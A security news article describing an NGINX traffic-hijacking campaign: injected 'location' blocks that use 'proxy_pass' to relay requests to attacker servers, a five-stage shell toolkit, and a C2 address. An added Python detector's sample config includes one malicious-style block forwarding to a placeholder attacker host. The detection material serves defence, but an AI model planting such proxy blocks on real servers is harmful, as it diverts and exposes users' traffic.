NGINX Servers Under Attack: How Hackers Redirect Your Traffic (Critical Security Alert) (2026)

In a shocking revelation, hackers are taking control of NGINX servers, redirecting user traffic through their own malicious infrastructure—a tactic that poses significant risks to web security.

NGINX, which stands for Engine X, is an open-source software solution widely used for managing web traffic. It acts as a bridge between users and servers, providing essential functions such as web serving, load balancing, caching, and reverse proxying. Its versatility makes it a popular choice for many websites.

Recently, this alarming campaign was uncovered by experts at Datadog Security Labs. They found that the attackers are specifically targeting NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains like .in, .id, .pe, .bd, and .th, as well as government and educational institutions that use .edu and .gov domains.

The method employed by these cybercriminals is quite sophisticated. They manipulate existing NGINX configuration files by inserting harmful ‘location’ blocks that match incoming requests for specific URL paths chosen by the attackers. Matching requests are forwarded, with the complete original URL appended, through the ‘proxy_pass’ directive to domains controlled by the attackers.

Normally, the ‘proxy_pass’ directive is the standard way NGINX forwards requests to backend servers, including load-balanced groups of them, to enhance performance and reliability. Because the directive itself is legitimate and common, its abuse tends to fly under the radar and triggers no security alerts on its own.

To maintain the appearance of legitimacy, the attackers ensure that crucial request headers such as ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ are preserved throughout the process. This clever manipulation further complicates detection efforts.

The attack unfolds through a multi-stage scripted toolkit that executes five distinct phases:

  1. Stage 1 – zx.sh: This initial controller script is responsible for downloading and executing subsequent stages. If tools like curl or wget are unavailable, it has a fallback mechanism that sends raw HTTP requests directly over TCP.
  2. Stage 2 – bt.sh: This stage targets NGINX configuration files managed via the Baota panel. It dynamically selects templates for injection based on the server_name value, carefully overwrites the configuration, and reloads NGINX to prevent service interruptions.
  3. Stage 3 – 4zdh.sh: Here, the toolkit scans common NGINX configuration directories such as sites-enabled, conf.d, and sites-available. It employs parsing utilities like csplit and awk to avoid corrupting existing configurations, checking for prior injections through hashing and a global mapping file, and validates changes using the command nginx -t prior to reloading.
  4. Stage 4 – zdh.sh: This phase narrows its focus mainly to the /etc/nginx/sites-enabled directory, emphasizing .in and .id domains. It follows the same nginx -t validation and reload procedure, with a forced restart (using pkill) available as a backup option.
  5. Stage 5 – ok.sh: The final stage scans the compromised NGINX configurations to compile a map of hijacked domains, injection templates, and proxy targets, sending this gathered data back to a command-and-control (C2) server located at 158.94.210[.]227.

One of the most concerning aspects of these attacks is their stealthy nature. Rather than exploiting vulnerabilities within NGINX itself, the attackers incorporate malicious commands directly into the configuration files. These files often go unchecked, making it difficult for administrators to spot anything amiss. Moreover, since user traffic still reaches its intended destination—often directly—the redirection through the attacker’s infrastructure typically goes unnoticed unless there is rigorous monitoring in place.
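Because the campaign hides in configuration rather than in a vulnerability, the practical check is to read the configuration files themselves. The following Python script is an added example, not code from the article or from Datadog: it walks every ‘location’ block in an NGINX configuration and reports those whose ‘proxy_pass’ forwards to a host outside loopback/private ranges and an operator-supplied allowlist, noting whether the full original URL ($request_uri) is appended. The sample configuration and the host attacker-relay.invalid are constructed placeholders.

```python
import ipaddress
import re
from urllib.parse import urlparse
# Constructed sample (not from the article): a normal local backend beside a
# location block of the kind described above, with a placeholder outside host.
SAMPLE_CONF = """
server {
    server_name example.in;
    location / { proxy_pass http://127.0.0.1:8080; }
    location /wp-login.php {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_pass http://attacker-relay.invalid$request_uri;
    }
}
"""
LOCATION_RE = re.compile(r"\blocation\s+(?:[=~*^]+\s+)?(\S+)\s*\{")
PROXY_PASS_RE = re.compile(r"\bproxy_pass\s+(\S+?)\s*;")

def _block_body(text, open_brace):
    # Text between text[open_brace] and its matching '}', honouring nested braces.
    depth = 0
    for i in range(open_brace, len(text)):
        depth += {"{": 1, "}": -1}.get(text[i], 0)
        if depth == 0:
            return text[open_brace + 1:i]
    return text[open_brace + 1:]

def _is_internal(host):
    # Loopback, private-range and localhost targets are ordinary reverse-proxy backends.
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_loopback or ip.is_private
    except ValueError:
        return host == "localhost"

def find_external_proxy_targets(conf_text, allowed_hosts=()):
    # Report every location block whose proxy_pass forwards to a host outside the allowlist.
    findings = []
    for m in LOCATION_RE.finditer(conf_text):
        body = _block_body(conf_text, m.end() - 1)
        for pp in PROXY_PASS_RE.finditer(body):
            target = pp.group(1)
            host = urlparse(target.split("$", 1)[0]).hostname or ""
            if "://" not in target or _is_internal(host) or host in allowed_hosts:
                continue  # upstream group name, unix: socket, or an expected backend
            findings.append({"location": m.group(1), "host": host,
                             "forwards_full_uri": "$request_uri" in target})
    return findings
```

Run it over the contents of sites-enabled, conf.d and sites-available (the directories the toolkit is reported to touch) and review any result that is not a backend you deployed.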

As we navigate the rapidly evolving landscape of information technology, staying informed about such threats is crucial. For those interested in enhancing their IT infrastructure, consider exploring modern solutions that can help minimize manual delays and boost efficiency through automation. This may just be the key to maintaining reliable, secure systems in today’s fast-paced digital world.



Author: Geoffrey Lueilwitz
